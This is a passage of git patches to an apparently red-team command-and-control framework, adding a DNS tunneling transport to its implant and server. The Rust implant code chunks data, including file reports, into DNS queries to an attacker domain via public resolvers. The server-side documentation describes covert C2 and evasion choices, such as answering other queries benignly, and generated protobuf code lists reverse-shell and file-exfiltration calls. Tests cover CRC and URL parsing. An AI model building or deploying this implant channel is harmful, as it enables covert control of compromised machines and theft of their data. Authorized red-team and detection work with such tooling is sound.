"ReportFile\x12\x15.c2.ReportFileRequest\x1a\x16.c2.ReportFileResponse(\x01\x12P\n" + + "\x11ReportProcessList\x12\x1c.c2.ReportProcessListRequest\x1a\x1d.c2.ReportProcessListResponse\x12O\n" + + "\x10ReportTaskOutput\x12\x1b.c2.ReportTaskOutputRequest\x1a\x1c.c2.ReportTaskOutputResponse\"\x00\x12G\n" + + "\fReverseShell\x12\x17.c2.ReverseShellRequest\x1a\x18.c2.ReverseShellResponse\"\x00(\x010\x01B#Z!realm.pub/tavern/internal/c2/c2pbb\x06proto3" var ( file_c2_proto_rawDescOnce sync.Once diff --git a/tavern/internal/c2/proto/c2.proto b/tavern/internal/c2/proto/c2.proto index 8fc5cf5b3..8ef213c85 100644 --- a/tavern/internal/c2/proto/c2.proto +++ b/tavern/internal/c2/proto/c2.proto @@ -29,6 +29,7 @@ message Beacon { TRANSPORT_UNSPECIFIED = 0; TRANSPORT_GRPC = 1; TRANSPORT_HTTP1 = 2; + TRANSPORT_DNS = 3; } Transport transport = 6; diff --git a/tavern/internal/ent/beacon/beacon.go b/tavern/internal/ent/beacon/beacon.go index d899a6428..d0803c2cb 100644 --- a/tavern/internal/ent/beacon/beacon.go +++ b/tavern/internal/ent/beacon/beacon.go @@ -128,7 +128,7 @@ var ( // TransportValidator is a validator for the "transport" field enum values. It is called by the builders before save. func TransportValidator(t c2pb.Beacon_Transport) error { switch t.String() { - case "TRANSPORT_GRPC", "TRANSPORT_HTTP1", "TRANSPORT_UNSPECIFIED": + case "TRANSPORT_GRPC", "TRANSPORT_HTTP1", "TRANSPORT_DNS", "TRANSPORT_UNSPECIFIED": return nil default: return fmt.Errorf("beacon: invalid enum value for transport field: %q", t) From 04bbaf6955f3052c7972b03e22bd4c93d2f5b01a Mon Sep 17 00:00:00 2001 From: KaliPatriot <43020092+KaliPatriot@users.noreply.github.com> Date: Wed, 24 Dec 2025 22:24:03 -0600 Subject: [PATCH 09/17] more updates --- docs/_docs/admin-guide/tavern.md | 7 + docs/_docs/user-guide/imix.md | 52 +- implants/lib/pb/src/generated/dns.rs | 6 +- implants/lib/transport/Cargo.toml | 1 + implants/lib/transport/src/dns.rs | 1044 ++++++++++++++---- tavern/internal/c2/dnspb/dns.pb.go | 6 +- tavern/internal/c2/proto/dns.proto | 6 +- tavern/internal/redirectors/dns/dns.go | 122 +-- tavern/internal/redirectors/dns/dns_test.go | 1085 +++++++++++++++---- 9 files changed, 1790 insertions(+), 539 deletions(-) diff --git a/docs/_docs/admin-guide/tavern.md b/docs/_docs/admin-guide/tavern.md index a924b87ce..01ef40c5c 100644 --- a/docs/_docs/admin-guide/tavern.md +++ b/docs/_docs/admin-guide/tavern.md @@ -155,6 +155,13 @@ tavern redirector --transport dns --listen "0.0.0.0:53?domain=c2.example.com&dom 2. Or run the redirector as your authoritative DNS server for the domain 3. Ensure UDP port 53 is accessible +**Server Behavior:** + +- **Benign responses**: Non-C2 queries to A records return `0.0.0.0` instead of NXDOMAIN to avoid breaking recursive DNS lookups (e.g., when using Cloudflare as an intermediary) +- **Conversation tracking**: The server tracks up to 10,000 concurrent conversations +- **Timeout management**: Conversations timeout after 15 minutes of inactivity (reduced to 5 minutes when at capacity) +- **Maximum data size**: 50MB per request + See the [DNS Transport Configuration](/user-guide/imix#dns-transport-configuration) section in the Imix user guide for more details on agent-side configuration. ### gRPC Redirector diff --git a/docs/_docs/user-guide/imix.md b/docs/_docs/user-guide/imix.md index 648f39dbd..b9766887c 100644 --- a/docs/_docs/user-guide/imix.md +++ b/docs/_docs/user-guide/imix.md @@ -182,31 +182,59 @@ cargo build --release --lib --target=x86_64-pc-windows-gnu ## DNS Transport Configuration -The DNS transport enables covert C2 communication by tunneling traffic through DNS queries and responses. This transport supports multiple DNS record types (TXT, A, AAAA) and can use either a specific DNS server or the system's default resolver. +The DNS transport enables covert C2 communication by tunneling traffic through DNS queries and responses. This transport supports multiple DNS record types (TXT, A, AAAA) and can use either specific DNS servers or the system's default resolver with automatic fallback. ### DNS URI Format When using the DNS transport, configure `IMIX_CALLBACK_URI` with the following format: ``` -dns:///[?type=&fallback=] +dns://?domain=[&type=] ``` **Parameters:** -- `` - DNS server IP address, or `*` to use system resolver (recommended) -- `` - Base domain for DNS queries (e.g., `c2.example.com` will result in queries like `abcd1234.c2.example.com`) -- `type` (optional) - Preferred DNS record type: `TXT` (default), `A`, or `AAAA` -- `fallback` (optional) - Enable automatic fallback to other record types on failure (default: `true`) +- `` - DNS server address(es), `*` to use system resolver, or comma-separated list (e.g., `8.8.8.8:53,1.1.1.1:53`) +- `domain` - Base domain for DNS queries (e.g., `c2.example.com`) +- `type` (optional) - DNS record type: `txt` (default), `a`, or `aaaa` **Examples:** ```bash -# Use specific DNS server (8.8.8.8) with TXT records and fallback enabled -export IMIX_CALLBACK_URI="dns://8.8.8.8/c2.example.com" +# Use specific DNS server with TXT records (default) +export IMIX_CALLBACK_URI="dns://8.8.8.8:53?domain=c2.example.com" -# Use system resolver, prefer A records only -export IMIX_CALLBACK_URI="dns://*/c2.example.com?type=A" +# Use system resolver with fallbacks +export IMIX_CALLBACK_URI="dns://*?domain=c2.example.com" -# Use system resolver with AAAA records and no fallback -export IMIX_CALLBACK_URI="dns://*/c2.example.com?type=AAAA&fallback=false" +# Use multiple DNS servers with A records +export IMIX_CALLBACK_URI="dns://8.8.8.8:53,1.1.1.1:53?domain=c2.example.com&type=a" + +# Use AAAA records +export IMIX_CALLBACK_URI="dns://8.8.8.8:53?domain=c2.example.com&type=aaaa" ``` + +### DNS Resolver Fallback + +When using `*` as the server, the agent uses system DNS servers followed by public resolvers (1.1.1.1, 8.8.8.8) as fallbacks. If system configuration cannot be read, only the public resolvers are used. When multiple servers are configured, the agent tries each server in order on every failed request until one succeeds, then uses the working server for subsequent requests. + +### Record Types + +| Type | Description | Use Case | +|------|-------------|----------| +| TXT | Text records (default) | Best throughput, data encoded in TXT RDATA | +| A | IPv4 address records | Lower profile, data encoded across multiple A records | +| AAAA | IPv6 address records | Medium profile, more data per record than A | + +### Protocol Details + +The DNS transport uses an async windowed protocol to handle UDP unreliability: + +- **Chunked transmission**: Large requests are split into chunks that fit within DNS query limits (253 bytes total domain length) +- **Windowed sending**: Up to 10 packets are sent concurrently +- **ACK/NACK protocol**: The server responds with acknowledgments for received chunks and requests retransmission of missing chunks +- **Automatic retries**: Failed chunks are retried up to 3 times before the request fails +- **CRC32 verification**: Data integrity is verified using CRC32 checksums + +**Limits:** +- Maximum data size: 50MB per request +- Maximum concurrent conversations on server: 10,000 diff --git a/implants/lib/pb/src/generated/dns.rs b/implants/lib/pb/src/generated/dns.rs index 67665d669..7797109c5 100644 --- a/implants/lib/pb/src/generated/dns.rs +++ b/implants/lib/pb/src/generated/dns.rs @@ -7,10 +7,10 @@ pub struct DnsPacket { /// Packet type #[prost(enumeration = "PacketType", tag = "1")] pub r#type: i32, - /// Chunk sequence number (0-based) + /// Chunk sequence number (0-Based for INIT, 1-based for DATA) #[prost(uint32, tag = "2")] pub sequence: u32, - /// 12-character random conversation ID + /// 8-character random conversation ID #[prost(string, tag = "3")] pub conversation_id: ::prost::alloc::string::String, /// Chunk payload (or InitPayload for INIT packets) @@ -65,7 +65,7 @@ pub struct InitPayload { #[allow(clippy::derive_partial_eq_without_eq)] #[derive(Clone, PartialEq, ::prost::Message)] pub struct FetchPayload { - /// Which chunk to fetch (0-based) + /// Which chunk to fetch (1-based) #[prost(uint32, tag = "1")] pub chunk_index: u32, } diff --git a/implants/lib/transport/Cargo.toml b/implants/lib/transport/Cargo.toml index 71fb52a1c..bb225e2b0 100644 --- a/implants/lib/transport/Cargo.toml +++ b/implants/lib/transport/Cargo.toml @@ -16,6 +16,7 @@ pb = { workspace = true } anyhow = { workspace = true } bytes = { workspace = true } +futures = { workspace = true } log = { workspace = true } prost = { workspace = true } prost-types = { workspace = true } diff --git a/implants/lib/transport/src/dns.rs b/implants/lib/transport/src/dns.rs index e9697c4a7..32ee0ee0e 100644 --- a/implants/lib/transport/src/dns.rs +++ b/implants/lib/transport/src/dns.rs @@ -1,8 +1,5 @@ -// DNS transport implementation for Realm C2 -// This module provides DNS-based communication with stateless packet protocol - use crate::Transport; -use anyhow::Result; +use anyhow::{Context, Result}; use pb::c2::*; use pb::dns::*; use prost::Message; @@ -200,7 +197,7 @@ impl DNS { } } - Err(last_error.unwrap_or_else(|| anyhow::anyhow!("All DNS servers failed"))) + Err(last_error.unwrap_or_else(|| anyhow::anyhow!("all DNS servers failed"))) } /// Try a single DNS query against a specific server @@ -222,7 +219,8 @@ impl DNS { let timeout_duration = std::time::Duration::from_secs(5); let len = tokio::time::timeout(timeout_duration, socket.recv(&mut buf)) .await - .map_err(|_| anyhow::anyhow!("DNS query timeout"))??; + .map_err(|_| anyhow::anyhow!("timeout")) + .context("DNS query timeout")??; buf.truncate(len); // Parse and validate response @@ -233,7 +231,7 @@ impl DNS { fn build_dns_query(&self, domain: &str) -> Result<(Vec, u16)> { let mut query = Vec::new(); - // Transaction ID (random for security) + // Transaction ID let txid = rand::random::(); query.extend_from_slice(&txid.to_be_bytes()); // Flags: standard query @@ -357,19 +355,19 @@ impl DNS { all_data.pop(); } - let encoded_str = String::from_utf8(all_data) - .map_err(|e| anyhow::anyhow!("Invalid UTF-8 in A/AAAA response: {}", e))?; + let encoded_str = + String::from_utf8(all_data).context("invalid UTF-8 in A/AAAA response")?; all_data = base32::decode( base32::Alphabet::Rfc4648 { padding: false }, &encoded_str.to_uppercase(), ) - .ok_or_else(|| anyhow::anyhow!("Failed to decode base32 from A/AAAA records"))?; + .ok_or_else(|| anyhow::anyhow!("base32 decode failed")) + .context("failed to decode base32 from A/AAAA records")?; } Ok(all_data) } - /// Send request and receive response using DNS protocol async fn dns_exchange(&mut self, request: Req, method_code: &str) -> Result where Req: Message + Send + 'static, @@ -383,15 +381,8 @@ impl DNS { Self::unmarshal_with_codec::(&response_data) } - /// Send raw request bytes and receive raw response bytes using DNS protocol with async transmission - /// Uses windowed transmission with ACK/NACK-based retransmission - async fn dns_exchange_raw( - &mut self, - request_data: Vec, - method_code: &str, - ) -> Result> { - use std::collections::{HashMap, HashSet}; - + /// Validate request data and calculate optimal chunking strategy + fn validate_and_prepare_chunks(&self, request_data: &[u8]) -> Result<(usize, usize, u32)> { // Validate data size if request_data.len() > MAX_DATA_SIZE { return Err(anyhow::anyhow!( @@ -423,7 +414,7 @@ impl DNS { } } - // Fallback for very large data (shouldn't happen with 50MB limit) + // Fallback for very large data result.unwrap_or_else(|| { let chunk_size = self.calculate_max_chunk_size(2097151); let total_chunks = ((request_data.len() + chunk_size - 1) / chunk_size).max(1); @@ -431,7 +422,7 @@ impl DNS { }) }; - let data_crc = Self::calculate_crc32(&request_data); + let data_crc = Self::calculate_crc32(request_data); log::debug!( "DNS: Request size={} bytes, chunks={}, chunk_size={} bytes, crc32={:#x}", @@ -441,26 +432,36 @@ impl DNS { data_crc ); - // Generate conversation ID - let conv_id = Self::generate_conv_id(); + Ok((chunk_size, total_chunks, data_crc)) + } - // Send INIT packet + /// Send INIT packet to start a new conversation + async fn send_init_packet( + &mut self, + conv_id: &str, + method_code: &str, + total_chunks: usize, + data_size: usize, + data_crc: u32, + ) -> Result<()> { let init_payload = InitPayload { method_code: method_code.to_string(), total_chunks: total_chunks as u32, data_crc32: data_crc, - file_size: request_data.len() as u32, + file_size: data_size as u32, }; let mut init_payload_bytes = Vec::new(); init_payload.encode(&mut init_payload_bytes)?; - log::debug!("DNS: INIT packet - conv_id={}, method={}, total_chunks={}, file_size={}, data_crc32={:#x}", - conv_id, method_code, total_chunks, request_data.len(), data_crc); + log::debug!( + "DNS: INIT packet - conv_id={}, method={}, total_chunks={}, file_size={}, data_crc32={:#x}", + conv_id, method_code, total_chunks, data_size, data_crc + ); let init_packet = DnsPacket { r#type: PacketType::Init.into(), sequence: 0, - conversation_id: conv_id.clone(), + conversation_id: conv_id.to_string(), data: init_payload_bytes, crc32: 0, window_size: SEND_WINDOW_SIZE as u32, @@ -468,119 +469,173 @@ impl DNS { nacks: vec![], }; - match self.send_packet(init_packet).await { - Ok(_) => { - log::debug!("DNS: INIT sent for conv_id={}", conv_id); - } - Err(e) => { - return Err(anyhow::anyhow!( - "Failed to send INIT packet to DNS server: {}.", - e - )); + self.send_packet(init_packet) + .await + .context("failed to send INIT packet")?; + log::debug!("DNS: INIT sent for conv_id={}", conv_id); + + Ok(()) + } + + /// Process a single chunk response and extract ACKs/NACKs + fn process_chunk_response( + response_data: &[u8], + seq_num: u32, + total_chunks: usize, + ) -> Result<(Vec, Vec)> { + let mut acks = Vec::new(); + let mut nacks = Vec::new(); + + if let Ok(status_packet) = DnsPacket::decode(response_data) { + if status_packet.r#type == PacketType::Status.into() { + // Process ACKs - collect acknowledged sequences + for ack_range in &status_packet.acks { + for ack_seq in ack_range.start_seq..=ack_range.end_seq { + acks.push(ack_seq); + } + } + + // Process NACKs - collect sequences needing retransmission + for &nack_seq in &status_packet.nacks { + if nack_seq >= 1 && nack_seq <= total_chunks as u32 { + nacks.push(nack_seq); + } + } } + } else { + log::debug!( + "DNS: Unknown response format ({} bytes), retrying chunk", + response_data.len() + ); + nacks.push(seq_num); } - // Async windowed transmission - let mut acknowledged = HashSet::new(); // Fully acknowledged chunks - let mut nack_set = HashSet::new(); - let mut retry_counts: HashMap = HashMap::new(); + Ok((acks, nacks)) + } - // Prepare chunks - let chunks: Vec> = request_data - .chunks(chunk_size) - .map(|chunk| chunk.to_vec()) - .collect(); + /// Send data chunks concurrently with windowed transmission + async fn send_data_chunks_concurrent( + &mut self, + chunks: &[Vec], + conv_id: &str, + total_chunks: usize, + ) -> Result<(std::collections::HashSet, std::collections::HashSet)> { + use std::collections::HashSet; + + let mut acknowledged = HashSet::new(); + let mut nack_set = HashSet::new(); + let mut send_tasks = Vec::new(); - // Send all chunks and collect ACKs/NACKs - // In async mode, each DATA packet gets immediate STATUS response via DNS request-response for seq in 1..=total_chunks { let seq_u32 = seq as u32; - // Skip if already acknowledged if acknowledged.contains(&seq_u32) { continue; } - let chunk = &chunks[seq - 1]; - - let data_packet = DnsPacket { - r#type: PacketType::Data.into(), - sequence: seq_u32, - conversation_id: conv_id.clone(), - data: chunk.clone(), - crc32: Self::calculate_crc32(chunk), - window_size: SEND_WINDOW_SIZE as u32, - acks: vec![], - nacks: vec![], - }; - - // Send DATA packet and get STATUS response - match self.send_packet(data_packet).await { - Ok(response_data) => { - // The response could be: - // 1. A marshaled STATUS packet (protobuf) - // 2. Plain "ok" string (backward compat) - // 3. Error response - - // Try to parse as STATUS packet (protobuf) - if let Ok(status_packet) = DnsPacket::decode(&response_data[..]) { - if status_packet.r#type == PacketType::Status.into() { - // Process ACKs - mark as acknowledged - for ack_range in &status_packet.acks { - for ack_seq in ack_range.start_seq..=ack_range.end_seq { - acknowledged.insert(ack_seq); - retry_counts.remove(&ack_seq); - } - } - - // Process NACKs - queue for retransmission - for &nack_seq in &status_packet.nacks { - if nack_seq >= 1 && nack_seq <= total_chunks as u32 { - nack_set.insert(nack_seq); - } - } - } - } else if response_data == b"ok" { - // Legacy "ok" response - assume this chunk was accepted - acknowledged.insert(seq_u32); - } else { - // Unknown response format - assume need to retry this chunk - log::debug!( - "DNS: Unknown response format ({} bytes), retrying chunk", - response_data.len() - ); - nack_set.insert(seq_u32); + let chunk = chunks[seq - 1].clone(); + let conv_id_clone = conv_id.to_string(); + let mut transport_clone = self.clone(); + + // Spawn concurrent task for this packet + let task = tokio::spawn(async move { + let data_packet = DnsPacket { + r#type: PacketType::Data.into(), + sequence: seq_u32, + conversation_id: conv_id_clone, + data: chunk.clone(), + crc32: Self::calculate_crc32(&chunk), + window_size: SEND_WINDOW_SIZE as u32, + acks: vec![], + nacks: vec![], + }; + + let result = transport_clone.send_packet(data_packet).await; + (seq_u32, result) + }); + + send_tasks.push(task); + + // Limit concurrent tasks to SEND_WINDOW_SIZE + if send_tasks.len() >= SEND_WINDOW_SIZE { + if let Some(task) = send_tasks.first_mut() { + if let Ok(task_result) = task.await { + self.handle_chunk_task_result( + task_result, + &mut acknowledged, + &mut nack_set, + total_chunks, + )?; } + send_tasks.remove(0); } - Err(e) => { - // DNS query failed - check if it's a size issue or transient error - let err_msg = e.to_string(); - eprintln!("DNS ERROR: Failed to send chunk {}: {}", seq_u32, err_msg); - - // If packet is too long, this is a fatal error (can't fix with retries) - if err_msg.contains("DNS query too long") { - return Err(anyhow::anyhow!( - "Chunk {} is too large to fit in DNS query: {}", - seq_u32, - err_msg - )); - } + } + } - // Check for connection/network errors - if err_msg.contains("timeout") - || err_msg.contains("refused") - || err_msg.contains("unreachable") - { - eprintln!("DNS ERROR: Connection to DNS server failed."); - } + // Wait for all remaining tasks to complete + for task in send_tasks { + if let Ok(task_result) = task.await { + self.handle_chunk_task_result( + task_result, + &mut acknowledged, + &mut nack_set, + total_chunks, + )?; + } + } + + Ok((acknowledged, nack_set)) + } + + /// Handle the result of a chunk transmission task + fn handle_chunk_task_result( + &self, + task_result: (u32, Result>), + acknowledged: &mut std::collections::HashSet, + nack_set: &mut std::collections::HashSet, + total_chunks: usize, + ) -> Result<()> { + match task_result { + (seq_num, Ok(response_data)) => { + let (acks, nacks) = + Self::process_chunk_response(&response_data, seq_num, total_chunks)?; + acknowledged.extend(acks); + nack_set.extend(nacks); + } + (seq_num, Err(e)) => { + let err_msg = e.to_string(); + #[cfg(debug_assertions)] + log::error!("Failed to send chunk {}: {}", seq_num, err_msg); - // Otherwise, mark for retry (transient network error) - nack_set.insert(seq_u32); + // If packet is too long, this is a fatal error + if err_msg.contains("DNS query too long") { + return Err(anyhow::anyhow!( + "Chunk {} is too large to fit in DNS query: {}", + seq_num, + err_msg + )); } + + // Otherwise, mark for retry + nack_set.insert(seq_num); } } + Ok(()) + } + + /// Retry NACKed chunks with retry limit + async fn retry_nacked_chunks( + &mut self, + chunks: &[Vec], + conv_id: &str, + total_chunks: usize, + mut nack_set: std::collections::HashSet, + acknowledged: &mut std::collections::HashSet, + ) -> Result<()> { + use std::collections::HashMap; + + let mut retry_counts: HashMap = HashMap::new(); - // Retry NACKed chunks while !nack_set.is_empty() { let nacks_to_retry: Vec = nack_set.drain().collect(); @@ -595,7 +650,7 @@ impl DNS { } *retries += 1; - // Skip if already acknowledged (may have been ACKed in another response) + // Skip if already acknowledged if acknowledged.contains(&nack_seq) { continue; } @@ -604,7 +659,7 @@ impl DNS { let retransmit_packet = DnsPacket { r#type: PacketType::Data.into(), sequence: nack_seq, - conversation_id: conv_id.clone(), + conversation_id: conv_id.to_string(), data: chunk.clone(), crc32: Self::calculate_crc32(chunk), window_size: SEND_WINDOW_SIZE as u32, @@ -614,26 +669,19 @@ impl DNS { match self.send_packet(retransmit_packet).await { Ok(response_data) => { - // Parse STATUS response - if let Ok(status_packet) = DnsPacket::decode(&response_data[..]) { - if status_packet.r#type == PacketType::Status.into() { - // Process ACKs - for ack_range in &status_packet.acks { - for ack_seq in ack_range.start_seq..=ack_range.end_seq { - acknowledged.insert(ack_seq); - retry_counts.remove(&ack_seq); - } - } - - // Process NACKs - for &new_nack in &status_packet.nacks { - if new_nack >= 1 - && new_nack <= total_chunks as u32 - && !acknowledged.contains(&new_nack) - { - nack_set.insert(new_nack); - } - } + let (acks, nacks) = + Self::process_chunk_response(&response_data, nack_seq, total_chunks)?; + + // Process ACKs + for ack_seq in acks { + acknowledged.insert(ack_seq); + retry_counts.remove(&ack_seq); + } + + // Process NACKs + for new_nack in nacks { + if !acknowledged.contains(&new_nack) { + nack_set.insert(new_nack); } } } @@ -646,30 +694,24 @@ impl DNS { } } - // Verify all chunks acknowledged - if acknowledged.len() != total_chunks { - return Err(anyhow::anyhow!( - "Not all chunks acknowledged after max retries: {}/{} chunks. Missing: {:?}", - acknowledged.len(), - total_chunks, - (1..=total_chunks as u32) - .filter(|seq| !acknowledged.contains(seq)) - .collect::>() - )); - } + Ok(()) + } + /// Fetch response from server, handling potentially chunked responses + async fn fetch_response( + &mut self, + conv_id: &str, + total_chunks: usize, + ) -> Result> { log::debug!( "DNS: All {} chunks acknowledged, sending FETCH", total_chunks ); - // All data sent and acknowledged - // Now request the response via FETCH (or END for backward compatibility) - // Send FETCH packet to get response let fetch_packet = DnsPacket { r#type: PacketType::Fetch.into(), sequence: (total_chunks + 1) as u32, - conversation_id: conv_id.clone(), + conversation_id: conv_id.to_string(), data: vec![], crc32: 0, window_size: 0, @@ -677,75 +719,119 @@ impl DNS { nacks: vec![], }; - let end_response = match self.send_packet(fetch_packet).await { - Ok(resp) => { - log::debug!("DNS: FETCH response received ({} bytes)", resp.len()); - resp - } - Err(e) => { - return Err(anyhow::anyhow!( - "Failed to fetch response from server: {}.", - e - )); - } - }; + let end_response = self + .send_packet(fetch_packet) + .await + .context("failed to fetch response from server")?; + log::debug!( + "DNS: FETCH response received ({} bytes)", + end_response.len() + ); // Validate response is not empty if end_response.is_empty() { return Err(anyhow::anyhow!("Server returned empty response.")); } - // Check if response contains ResponseMetadata (chunked response indicator) - if end_response.len() > 2 && end_response != b"ok" { - // Try to parse as ResponseMetadata (plain protobuf, not encrypted) - if let Ok(metadata) = ResponseMetadata::decode(&end_response[..]) { - // Response is chunked - fetch all chunks - let total_chunks = metadata.total_chunks as usize; - let expected_crc = metadata.data_crc32; - - // Fetch all encrypted response chunks and concatenate - let mut full_response = Vec::new(); - for chunk_idx in 1..=total_chunks { - // Create FetchPayload with 1-based chunk index - let fetch_payload = FetchPayload { - chunk_index: chunk_idx as u32, - }; - let mut fetch_payload_bytes = Vec::new(); - fetch_payload.encode(&mut fetch_payload_bytes)?; - - let fetch_packet = DnsPacket { - r#type: PacketType::Fetch.into(), - sequence: (total_chunks as u32 + 2 + chunk_idx as u32), - conversation_id: conv_id.clone(), - data: fetch_payload_bytes, - crc32: 0, - window_size: 0, - acks: vec![], - nacks: vec![], - }; + // Check if response is chunked + if let Ok(metadata) = ResponseMetadata::decode(&end_response[..]) { + if metadata.total_chunks > 0 { + return self.fetch_chunked_response(conv_id, total_chunks, &metadata).await; + } + } - // Each chunk is encrypted - get raw chunk data - let chunk_data = self.send_packet(fetch_packet).await?; - full_response.extend_from_slice(&chunk_data); - } + Ok(end_response) + } - // Verify CRC of the complete encrypted response - let actual_crc = Self::calculate_crc32(&full_response); - if actual_crc != expected_crc { - return Err(anyhow::anyhow!( - "Response CRC mismatch: expected {}, got {}", - expected_crc, - actual_crc - )); - } + /// Fetch and reassemble a chunked response from server + async fn fetch_chunked_response( + &mut self, + conv_id: &str, + base_sequence: usize, + metadata: &ResponseMetadata, + ) -> Result> { + let total_chunks = metadata.total_chunks as usize; + let expected_crc = metadata.data_crc32; + let mut full_response = Vec::new(); - // Return the complete reassembled encrypted response data - return Ok(full_response); - } + for chunk_idx in 1..=total_chunks { + let fetch_payload = FetchPayload { + chunk_index: chunk_idx as u32, + }; + let mut fetch_payload_bytes = Vec::new(); + fetch_payload.encode(&mut fetch_payload_bytes)?; + + let fetch_packet = DnsPacket { + r#type: PacketType::Fetch.into(), + sequence: (base_sequence as u32 + 2 + chunk_idx as u32), + conversation_id: conv_id.to_string(), + data: fetch_payload_bytes, + crc32: 0, + window_size: 0, + acks: vec![], + nacks: vec![], + }; + + let chunk_data = self.send_packet(fetch_packet).await?; + full_response.extend_from_slice(&chunk_data); } - // Single response (small enough to fit in one packet) - Ok(end_response) + let actual_crc = Self::calculate_crc32(&full_response); + if actual_crc != expected_crc { + return Err(anyhow::anyhow!( + "Response CRC mismatch: expected {}, got {}", + expected_crc, + actual_crc + )); + } + + Ok(full_response) + } + + async fn dns_exchange_raw( + &mut self, + request_data: Vec, + method_code: &str, + ) -> Result> { + // Validate and prepare chunks + let (chunk_size, total_chunks, data_crc) = self.validate_and_prepare_chunks(&request_data)?; + + // Generate conversation ID + let conv_id = Self::generate_conv_id(); + + // Send INIT packet + self.send_init_packet(&conv_id, method_code, total_chunks, request_data.len(), data_crc) + .await?; + + // Prepare chunks + let chunks: Vec> = request_data + .chunks(chunk_size) + .map(|chunk| chunk.to_vec()) + .collect(); + + // Send all chunks using concurrent windowed transmission + let (mut acknowledged, nack_set) = self + .send_data_chunks_concurrent(&chunks, &conv_id, total_chunks) + .await?; + + // Retry NACKed chunks + self.retry_nacked_chunks(&chunks, &conv_id, total_chunks, nack_set, &mut acknowledged) + .await?; + + // Verify all chunks acknowledged + if acknowledged.len() != total_chunks { + return Err(anyhow::anyhow!( + "Not all chunks acknowledged after max retries: {}/{} chunks. Missing: {:?}", + acknowledged.len(), + total_chunks, + (1..=total_chunks as u32) + .filter(|seq| !acknowledged.contains(seq)) + .collect::>() + )); + } + + // Fetch response from server + self.fetch_response(&conv_id, total_chunks).await } } @@ -761,9 +847,9 @@ impl Transport for DNS { fn new(callback: String, _proxy_uri: Option) -> Result { // Parse DNS URL formats: - // dns://server:port?domain=example.com&type=txt (single server, TXT records) - // dns://*?domain=example.com&type=a (use system DNS + fallbacks, A records) - // dns://8.8.8.8:53,1.1.1.1:53?domain=example.com&type=aaaa (multiple servers, AAAA records) + // dns://server:port?domain=dnsc2.realm.pub&type=txt (single server, TXT records) + // dns://*?domain=dnsc2.realm.pub&type=a (use system DNS + fallbacks, A records) + // dns://8.8.8.8:53,1.1.1.1:53?domain=dnsc2.realm.pub&type=aaaa (multiple servers, AAAA records) let url = if callback.starts_with("dns://") { callback } else { @@ -775,7 +861,12 @@ impl Transport for DNS { .query_pairs() .find(|(k, _)| k == "domain") .map(|(_, v)| v.to_string()) - .unwrap_or_else(|| "example.com".to_string()); + .ok_or_else(|| anyhow::anyhow!("domain parameter is required"))? + .to_string(); + + if base_domain.is_empty() { + return Err(anyhow::anyhow!("domain parameter cannot be empty")); + } // Parse record type from URL (default: TXT) let record_type = parsed @@ -879,9 +970,10 @@ impl Transport for DNS { )?; // Send chunk through channel - if sender.send(chunk_response).is_err() { - return Err(anyhow::anyhow!("Failed to send chunk: receiver dropped")); - } + sender + .send(chunk_response) + .map_err(|_| anyhow::anyhow!("receiver dropped")) + .context("failed to send chunk")?; offset += chunk_len; } @@ -905,9 +997,7 @@ impl Transport for DNS { let handle = tokio::spawn(async move { let mut all_chunks = Vec::new(); - // Iterate over the sync channel receiver in a spawned task to avoid blocking for chunk in request { - // Encrypt each chunk individually (like old implementation) let chunk_bytes = Self::marshal_with_codec::(chunk)?; // Prefix each chunk with its length (4 bytes, big-endian) @@ -921,15 +1011,13 @@ impl Transport for DNS { // Wait for the spawned task to complete let all_chunks = handle .await - .map_err(|e| anyhow::anyhow!("Failed to join chunk collection task: {}", e))??; + .context("failed to join chunk collection task")??; if all_chunks.is_empty() { return Err(anyhow::anyhow!("No file data provided")); } - // Send all chunks as a single DNS exchange (chunks are already individually encrypted) - // This is RAW data - multiple length-prefixed encrypted messages concatenated - // Do NOT encrypt again - pass directly to server + // Send all chunks as a single DNS exchange let response_bytes = self .dns_exchange_raw(all_chunks, "/c2.C2/ReportFile") .await?; @@ -978,3 +1066,499 @@ impl Transport for DNS { vec!["dns".to_string()] } } + +#[cfg(test)] +mod tests { + use super::*; + use pb::dns::PacketType; + + // ============================================================ + // CRC32 Tests + // ============================================================ + + #[test] + fn test_crc32_basic() { + let data = b"test data for CRC validation"; + let crc = DNS::calculate_crc32(data); + + // Verify same data produces same CRC + let crc2 = DNS::calculate_crc32(data); + assert_eq!(crc, crc2); + + // Verify different data produces different CRC + let crc3 = DNS::calculate_crc32(b"test datA for CRC validation"); + assert_ne!(crc, crc3); + } + + #[test] + fn test_crc32_known_value() { + // CRC32 IEEE of "123456789" is 0xCBF43926 + let data = b"123456789"; + let crc = DNS::calculate_crc32(data); + assert_eq!(crc, 0xCBF43926); + } + + #[test] + fn test_generate_conv_id_length() { + let conv_id = DNS::generate_conv_id(); + assert_eq!(conv_id.len(), CONV_ID_LENGTH); + } + + #[test] + fn test_generate_conv_id_charset() { + let conv_id = DNS::generate_conv_id(); + for c in conv_id.chars() { + assert!(c.is_ascii_lowercase() || c.is_ascii_digit()); + } + } + + #[test] + fn test_generate_conv_id_uniqueness() { + let id1 = DNS::generate_conv_id(); + let id2 = DNS::generate_conv_id(); + // Statistically, two random 8-char IDs should not be equal + assert_ne!(id1, id2); + } + + #[test] + fn test_encode_data_lowercase() { + let data = b"hello"; + let encoded = DNS::encode_data(data); + + // Should be lowercase + assert_eq!(encoded, encoded.to_lowercase()); + } + + #[test] + fn test_encode_data_valid_chars() { + let data = b"test data with various bytes \x00\xFF"; + let encoded = DNS::encode_data(data); + + // Base32 only uses a-z, 2-7 + for c in encoded.chars() { + assert!( + c.is_ascii_lowercase() || ('2'..='7').contains(&c), + "Invalid char in base32: {}", + c + ); + } + } + + // ============================================================ + // URL Parsing / Transport::new Tests + // ============================================================ + + #[test] + fn test_new_single_server() { + let dns = + DNS::new("dns://8.8.8.8:53?domain=dnsc2.realm.pub".to_string(), None).expect("should parse"); + + assert_eq!(dns.base_domain, "dnsc2.realm.pub"); + assert!(dns.dns_servers.contains(&"8.8.8.8:53".to_string())); + assert_eq!(dns.record_type, DnsRecordType::TXT); + } + + #[test] + fn test_new_multiple_servers() { + // Multiple servers are specified in the host portion, comma-separated + let dns = DNS::new( + "dns://8.8.8.8,1.1.1.1:53?domain=dnsc2.realm.pub".to_string(), + None, + ) + .expect("should parse"); + + assert_eq!(dns.dns_servers.len(), 2); + assert!(dns.dns_servers.contains(&"8.8.8.8:53".to_string())); + assert!(dns.dns_servers.contains(&"1.1.1.1:53".to_string())); + } + + #[test] + fn test_new_record_type_a() { + let dns = DNS::new("dns://8.8.8.8?domain=dnsc2.realm.pub&type=a".to_string(), None) + .expect("should parse"); + assert_eq!(dns.record_type, DnsRecordType::A); + } + + 